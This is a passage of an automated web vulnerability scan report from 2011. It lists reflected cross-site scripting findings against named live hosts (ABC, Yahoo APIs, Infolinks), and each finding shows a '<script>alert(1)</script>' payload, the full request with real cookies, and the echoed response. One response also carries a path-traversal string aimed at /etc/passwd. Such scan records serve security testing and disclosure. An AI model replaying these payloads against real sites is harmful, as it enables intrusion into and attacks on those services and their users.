Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5974
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Error - 404 </title> ...[SNIP]... <!-- ~#~#VP2#~#~ Version: 06.00.0014.2rc2 ~~~ Brandid: 001 ~~~ /crossdomain.xml650a7--><script>alert(1)</script>b7520712271 --> ...[SNIP]...
4.149. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://qa.n7.vp2.abc.go.com |
| Path: | /xml/alert.xml |
Issue detail
The value of REST URL parameter 1 is copied into an HTML comment. The payload b628c--><script>alert(1)</script>5426b9bf004 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /xmlb628c--><script>alert(1)</script>5426b9bf004/alert.xml?&offset=300&201181755 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5982
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Error - 404 </title> ...[SNIP]... <!-- ~#~#VP2#~#~ Version: 06.00.0014.2rc2 ~~~ Brandid: 001 ~~~ /xmlb628c--><script>alert(1)</script>5426b9bf004/alert.xml?&offset=300&201181755 --> ...[SNIP]...
4.150. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Firm |
| Host: | http://qa.n7.vp2.abc.go.com |
| Path: | /xml/alert.xml |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37608<a>6a6ab97d218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /xml37608<a>6a6ab97d218/alert.xml?&offset=300&201181755 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5951
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Error - 404 </title> ...[SNIP]... <div id="exception"> exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (xml37608<a>6a6ab97d218)' in /data/ZendFramework-1.10.8/library/Zend/Controller/Dispatcher/Standard.php:248 Stack trace: #0 /data/ZendFramework-1.10.8/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standa ...[SNIP]...
4.151. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://qa.n7.vp2.abc.go.com |
| Path: | /xml/alert.xml |
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload b2040--><script>alert(1)</script>de55340569 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /xml/alert.xmlb2040--><script>alert(1)</script>de55340569?&offset=300&201181755 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5956
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Error - 404 </title> ...[SNIP]... <!-- ~#~#VP2#~#~ Version: 06.00.0014.2rc2 ~~~ Brandid: 001 ~~~ /xml/alert.xmlb2040--><script>alert(1)</script>de55340569?&offset=300&201181755 --> ...[SNIP]...
4.152. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://query.yahooapis.com |
| Path: | /v1/public/yql/uhTrending/cokeTrending2 |
Issue detail
The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 975e8<script>alert(1)</script>8e1784da2c was submitted in the limit parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1975e8<script>alert(1)</script>8e1784da2c HTTP/1.1
Host: query.yahooapis.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:26 GMT
Server: YTS/1.19.8
Age: 0
Proxy-Connection: keep-alive
Content-Length: 177

YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1975e8<script>alert(1)</script>8e1784da2c'"}});
4.153. http://router.infolinks.com/gsd/1316238723013.0 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://router.infolinks.com |
| Path: | /gsd/1316238723013.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c817e<script>alert(1)</script>328a2b755f1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316238723013.0?callback=INFOLINKS.gsdCallbackc817e<script>alert(1)</script>328a2b755f1&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:50:40 GMT
Connection: close

INFOLINKS.gsdCallbackc817e<script>alert(1)</script>328a2b755f1({rid:'8539b123-083b-4c4f-88aa-0b6e254cc58a',rs:'rt1904.infolinks.com',makey:'45405e42435e4142435e4140465f414341464242404746414545405f69727076',ms:'1305',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );
4.154. http://router.infolinks.com/gsd/1316238747946.0 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://router.infolinks.com |
| Path: | /gsd/1316238747946.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6a0db<script>alert(1)</script>537547a0793 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316238747946.0?callback=INFOLINKS.gsdCallback6a0db<script>alert(1)</script>537547a0793&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F2011%2F09%2F16%2Fexclusive-melissa-rivers-splits-with-boyfriend%2F&jsv=221.3.5b HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=0

Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:51:05 GMT
Connection: close

INFOLINKS.gsdCallback6a0db<script>alert(1)</script>537547a0793({rid:'37868f9f-f929-4208-ad72-c0399ed20ffc',rs:'rt1303.infolinks.com',makey:'4b4e504c4d504f4c4d504f4e48514f4d4f484c4c4e494648484a4d5169767f7e',ms:'1305',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );
4.155. http://router.infolinks.com/gsd/1316238789101.0 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://router.infolinks.com |
| Path: | /gsd/1316238789101.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f71aa<script>alert(1)</script>a749c541a4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316238789101.0?callback=INFOLINKS.gsdCallbackf71aa<script>alert(1)</script>a749c541a4&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2Fnews%2F&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=1

Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 262
Date: Sat, 17 Sep 2011 00:51:47 GMT
Connection: close

INFOLINKS.gsdCallbackf71aa<script>alert(1)</script>a749c541a4({rid:'9ec68ba8-daa0-4f64-9dfd-e1b4fcda2b2c',rs:'rt1302.infolinks.com',makey:'1316081415081714150817161009171517101414161e14111310150969707372',ms:'1305',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );
4.156. http://router.infolinks.com/gsd/1316238970770.0 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://router.infolinks.com |
| Path: | /gsd/1316238970770.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6d7c0<script>alert(1)</script>807ea01e6bb was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316238970770.0?callback=INFOLINKS.gsdCallback6d7c0<script>alert(1)</script>807ea01e6bb&pid=159065&wsid=0&pdom=www.tmz.com&purl=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&jsv=221.3.5b HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=2

Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 262
Date: Sat, 17 Sep 2011 00:57:36 GMT
Connection: close

INFOLINKS.gsdCallback6d7c0<script>alert(1)</script>807ea01e6bb({rid:'e41c5bc1-607e-4eff-9b5c-ebf6875eb0e8',rs:'rt1803.infolinks.com',makey:'4346584445584744455847464059474547404444474741414747475969747674',ms:'1704',scl:true,wd:{drm:'POST',ha:{cls:['post']}}} );
4.157. http://router.infolinks.com/gsd/1316239040251.0 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://router.infolinks.com |
| Path: | /gsd/1316239040251.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ff2bd<script>alert(1)</script>2eed346dbcf was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316239040251.0?callback=INFOLINKS.gsdCallbackff2bd<script>alert(1)</script>2eed346dbcf&pid=159065&wsid=0&pdom=www.tmz.com&purl=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F%3Fadid%3Dhero3&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3

Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:59:12 GMT
Connection: close

INFOLINKS.gsdCallbackff2bd<script>alert(1)</script>2eed346dbcf({rid:'6a030d7f-3ffa-45f9-b35d-d05a342d0f11',rs:'rt1302.infolinks.com',makey:'45405e42435e4142435e4140465f414341464242414247424442445f6974737f',ms:'1704',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );
4.158. http://router.infolinks.com/gsd/1316239125269.0 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://router.infolinks.com |
| Path: | /gsd/1316239125269.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c225d<script>alert(1)</script>c979af99300 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316239125269.0?callback=INFOLINKS.gsdCallbackc225d<script>alert(1)</script>c979af99300&pid=159065&wsid=0&pdom=www.tmz.com&purl=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F%3Fadid%3Dhero1&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 01:01:43 GMT
Connection: close

INFOLINKS.gsdCallbackc225d<script>alert(1)</script>c979af99300({rid:'bc3821af-c889-497d-ad21-4b884080eee9',rs:'rt1901.infolinks.com',makey:'47425c40415c4340415c4342445d434143444040434640414145475d69737275',ms:'1805',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );
4.159. http://router.infolinks.com/gsd/1316239185968.0 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://router.infolinks.com |
| Path: | /gsd/1316239185968.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ef5a2<script>alert(1)</script>62d6a50225d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316239185968.0?callback=INFOLINKS.gsdCallbackef5a2<script>alert(1)</script>62d6a50225d&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2Fcategory%2Fceleb-couples%2F&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=5

Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 01:08:15 GMT
Connection: close

INFOLINKS.gsdCallbackef5a2<script>alert(1)</script>62d6a50225d({rid:'fbcb16da-871a-4353-9f5b-374c34a2c8b3',rs:'rt1802.infolinks.com',makey:'45405e42435e4142435e4140465f414341464242414841454942495f6974747e',ms:'1704',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );
4.160. http://router.infolinks.com/gsd/1316239193603.0 [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://router.infolinks.com |
| Path: | /gsd/1316239193603.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fe53e<script>alert(1)</script>cbd73a72ca0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316239193603.0?callback=INFOLINKS.gsdCallbackfe53e<script>alert(1)</script>cbd73a72ca0&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F2011%2F09%2F15%2Fashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos%2F&jsv=221.3.5b HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=6

Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 01:08:47 GMT
Connection: close

INFOLINKS.gsdCallbackfe53e<script>alert(1)</script>cbd73a72ca0({rid:'db5a6b31-44ef-4f3c-ad65-34708253120a',rs:'rt1902.infolinks.com',makey:'47425c40415c4340415c4342445d434143444040434a464a42434b5d69747274',ms:'1704',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );
4.161. http://rt1302.infolinks.com/action/doq.htm [rid parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://rt1302.infolinks.com |
| Path: | /action/doq.htm |
Issue detail
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 73873<script>alert(1)</script>96519b5c9d9 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /action/doq.htm?pcode=utf-8&r=1316239041277.1 HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9824
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3

makey=4b4e504c4d504f4c4d504f4e48514f4d4f484c4c4f4e494b49464d51697f7277&pimgs=justin%20timberlake%7Cnot%20my%20penis%21%7Cron%20artest%7Cname%20change%20official%7Csay%20hello%20to%20world%20peace%7Cmi ...[SNIP]... cy%7Cterms%20of%20use%7Cadvertising%20inquiries%7Cmedia%20inquiries%7Chpmg%20news%7Cvenue%20name%7Creview%7Cwebsite%7Cdirections%7Cmore&jsv=222%2E0%2E4&rid=da106062%2D18d8%2D449e%2D805a%2Dc1785d15d58b73873<script>alert(1)</script>96519b5c9d9&crtw=0&by=f&crtss=30&phdrs=%7Creader%20comments%7Cthe%20laundry%20list%7Ctmz%20sports%7Cbeauty%7Ctmz%20on%20tv%7Cfeatured%20in%20exclusive%7Cexclusive%20must%20reads%7Ctoo%20fab%21%7Chot%20photo%20ga ...[SNIP]...

Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid="8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec"; Version=1; Domain=infolinks.com; Max-Age=2147483647; Expires=Thu, 05-Oct-2079 04:14:37 GMT; Path=/
Set-Cookie: cnoi=74; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:14:37 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2302
